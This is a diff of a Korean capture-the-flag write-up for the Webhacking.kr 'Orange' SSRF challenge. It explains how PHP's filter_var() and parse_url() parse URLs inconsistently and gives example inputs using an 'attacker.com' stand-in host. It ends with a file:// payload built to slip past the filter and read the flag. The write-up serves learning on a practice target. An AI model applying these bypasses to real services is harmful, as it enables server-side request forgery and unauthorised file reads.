--- a/_posts/2024-12-01-orange.md
+++ b/_posts/2024-12-01-orange.md
@@ -1,5 +1,5 @@
 ---
-title: ["[Webhacking.kr] 🍊 (ssrf - 200)"]
+title: ["[Webhacking.kr] Orange🍊 (ssrf - 300)"]
 date: 2024-12-01 09:00:00 +0900
 categories: [writeup, webhacking.kr]
 tags: [web, ssrf]
@@ -25,7 +25,7 @@ tags: [web, ssrf]
 
 * .txt 확장자가 자동으로 추가됨
 * `FILTER_VALIDATE_URL`로 유효한 URL인지 검사
-* URL이 http://webhacking.kr:10009/로 시작하는지 검사
+* URL에 `http://webhacking.kr:10009/` 문자열이 있는지 검사
 * 특수문자 `@`,`#`,`(`,`)`,`$`,`` ` ``,`'`,`"`,`_`,`{`,`}`,`?`, 사용 불가
 * host가 "webhacking.kr"이고 port가 10009인지 검사
 * URL에 user와 pass 정보가 없어야 함
@@ -49,75 +49,63 @@ URI RFC 구문의 특징으로 `;`, `,`와 같은 특수문자들은 URL의 sche
 이런 URL 파싱의 불일치를 이용하여 SSRF를 일으킬 수 있다.  
 
 ```php
-echo "<pre>";
-echo "PHP Version: " . phpversion() . "<br><br>";
+<?php
+$url = $argv[1] ;
 
-// Test cases for URLs
-$test_urls = [
-    'http://google.com',
-    'https://google.com:80',
-    'http://attacker.com;google.com',
-    '0://attacker.com;google.com',
-    '0://attacker.com:80,google.com:80',
-    '0://attacker.com:80,google.com:80/../../../../flag'
-];
+// URL Validating
+$is_valid = filter_var($url, FILTER_VALIDATE_URL);
+echo "Valid URL: " . ($is_valid ? "Yes" : "No") . "\n";
 
-// Test each URL
-foreach ($test_urls as $url) {
-    echo "=== Testing URL: " . htmlspecialchars($url) . " ===<br>";
-    
-    // URL Validating
-    $is_valid = filter_var($url, FILTER_VALIDATE_URL);
-    echo "Valid URL: " . ($is_valid ? "Yes" : "No") . "<br>";
-    
-    // URL Parsing
-    $parsed = parse_url($url);
-    if ($parsed) {
-        echo "URL Components:<br>";
-        echo "- Scheme: " . (isset($parsed['scheme']) ? $parsed['scheme'] : 'N/A') . "<br>";
-        echo "- Host: " . (isset($parsed['host']) ? $parsed['host'] : 'N/A') . "<br>";
-        echo "- Port: " . (isset($parsed['port']) ? $parsed['port'] : 'N/A') . "<br>";
-        echo "- Path: " . (isset($parsed['path']) ? $parsed['path'] : 'N/A') . "<br>";
-        echo "- User: " . (isset($parsed['user']) ? $parsed['user'] : 'N/A') . "<br>";
-        echo "- Pass: " . (isset($parsed['pass']) ? $parsed['pass'] : 'N/A') . "<br>";
-    } else {
-        echo "Could not parse URL<br>";
-    }
-    echo "<br>";
+// URL Parsing
+$parsed = parse_url($url);
+if ($parsed) {
+    echo "[Scheme] : " . (isset($parsed['scheme']) ? $parsed['scheme'] : 'N/A') . "\n";
+    echo "- Host: " . (isset($parsed['host']) ? $parsed['host'] : 'N/A') . "\n";
+    echo "- Port: " . (isset($parsed['port']) ? $parsed['port'] : 'N/A') . "\n";
+    echo "- Path: " . (isset($parsed['path']) ? $parsed['path'] : 'N/A') . "\n";
+} else {
+    echo "Could not parse URL\n";
 }
-echo "</pre>";
 ```
 
 PHP 7.3버전에서 `filter_var()`함수와 `parse_url()`함수가 어떻게 동작하는지 자세히 알아보자.  
 
 ```
-=== Testing URL: http://attacker.com;google.com ===
+$ php urlval.php http://attacker.com,google.com
 Valid URL: No
-URL Components:
-- Scheme: http
-- Host: attacker.com;google.com
+[Scheme] : http
+[Host]   : attacker.com,google.com
+[Port]   : N/A
+[Path]   : N/A
 ```
-단순히 `;`과 같은 delimiter를 사용하는 것으로는, `filter_var()`함수를 우회하지 못한다.  
+단순히 `,`과 같은 delimiter를 사용하는 것으로는, `filter_var()`함수를 우회하지 못한다.  
 
 ```
-=== Testing URL: 0://attacker.com;google.com ===
+$ php urlval.php 0://attacker.com,google.com
 Valid URL: Yes
-URL Components:
-- Scheme: 0
-- Host: attacker.com;google.com
-```  
+[Scheme] : 0
+[Host]   : attacker.com,google.com
+[Port]   : N/A
+[Path]   : N/A
+``` 
  `http://` 대신 `0://`을 사용한다면, `filter_var()`를 우회할 수 있다.  
  하지만, `Host`에 `;google.com`이 포함되어, `curl` 등으로 정상적으로 통신을 요청하지 못한다.  
 
 ```
-=== Testing URL: 0://attacker.com:80,google.com:80 ===
+$ php urlval.php 0://attacker.com:80,google.com:80
 Valid URL: Yes
-URL Components:
-- Scheme: 0
-- Host: attacker.com:80,google.com
-- Port: 80
-```  
+[Scheme] : 0
+[Host]   : attacker.com,google.com
+[Port]   : 80
+[Path]   : N/A
+``` 
 위와 같이 포트까지 지정을 해준다면 curl이 `Host`를 읽을 때, 포트 앞까지만 읽어 `attacker.com`으로 통신이 성공한다.  
 
 
+### Payload 구성
+위의 개념으로 페이로드를 구성해보자.  
+1. `filter_var()` 함수를 통과해야 함.
+2. `http://webhacking.kr:10009/` 문자열을 포함해야 함.
+3. `Host`는 `webhacking.kr`, `Port`는 `10009`로 인식돼야 함.
 
+$ php urlval.php file://webhacking.kr:10009/,http://webhacking.kr:10009/../../../../../flag
